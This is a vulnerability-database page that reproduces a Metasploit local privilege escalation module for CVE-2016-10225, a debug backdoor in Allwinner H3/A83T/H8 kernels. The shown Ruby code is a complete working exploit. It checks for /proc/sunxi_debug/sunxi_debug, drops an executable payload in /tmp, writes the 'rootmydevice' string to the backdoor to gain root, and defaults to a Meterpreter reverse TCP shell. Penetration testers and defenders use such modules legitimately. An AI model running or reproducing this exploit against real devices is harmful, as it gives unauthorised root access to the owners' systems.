Lucene search
K

Allwinner 3.4 Legacy Kernel Local Privilege Escalation

🗓️ 23 Sep 2016 02:08:24Reported by h00die <[email protected]>, KotCzarnyType 
metasploit
 metasploit
🔗 www.rapid7.com👁 64 Views

Allwinner 3.4 Legacy Kernel Local Privilege Escalation module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC devices - H3, A83T, and H8. Vulnerable OSes include Orange Pis, FriendlyARM's NanoPi M1, SinoVoip's M2+ and M3, Cuebietech's Cubietruck+, Linksprite's pcDuino8 Uno, Dragon (x10), and Allwinner Android tablets

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2016-10225
27 Mar 201700:00
attackerkb
Circl
CVE-2016-10225
29 May 201815:50
circl
CVE
CVE-2016-10225
27 Mar 201717:00
cve
Cvelist
CVE-2016-10225
27 Mar 201717:00
cvelist
EUVD
EUVD-2016-1410
7 Oct 202500:30
euvd
NVD
CVE-2016-10225
27 Mar 201717:59
nvd
Prion
Code injection
27 Mar 201717:59
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Allwinner 3.4 Legacy Kernel Local Privilege Escalation',
        'Description' => %q{
          This module attempts to exploit a debug backdoor privilege escalation in
          Allwinner SoC based devices.

          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.

          Vulnerable OS: all OS images available for Orange Pis,
          any for FriendlyARM's NanoPi M1,
          SinoVoip's M2+ and M3,
          Cuebietech's Cubietruck +
          Linksprite's pcDuino8 Uno.
          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die <[email protected]>', # Module
          'KotCzarny' # Discovery
        ],
        'Platform' => [ 'android', 'linux' ],
        'DisclosureDate' => '2016-04-30',
        'DefaultOptions' => {
          'payload' => 'linux/armle/meterpreter/reverse_tcp'
        },
        'Privileged' => true,
        'Arch' => ARCH_ARMLE,
        'References' => [
          [ 'CVE', '2016-10225' ],
          [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
          [
            'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:' \
                   'https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'
          ],
          [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
        ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Auto', {} ]
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'DefaultTarget' => 0
      )
    )
  end

  def check
    backdoor = '/proc/sunxi_debug/sunxi_debug'

    if file_exist?(backdoor)
      return CheckCode::Appears("#{backdoor} exists")
    end

    CheckCode::Safe("Backdoor #{backdoor} not found")
  end

  def exploit
    backdoor = '/proc/sunxi_debug/sunxi_debug'

    fail_with(Failure::NotVulnerable, "Backdoor #{backdoor} not found.") unless file_exist?(backdoor)

    pl = generate_payload_exe
    exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
    vprint_good "Backdoor Found, writing payload to #{exe_file}"
    write_file(exe_file, pl)
    cmd_exec("chmod +x #{exe_file}")

    vprint_good('Escalating')
    cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation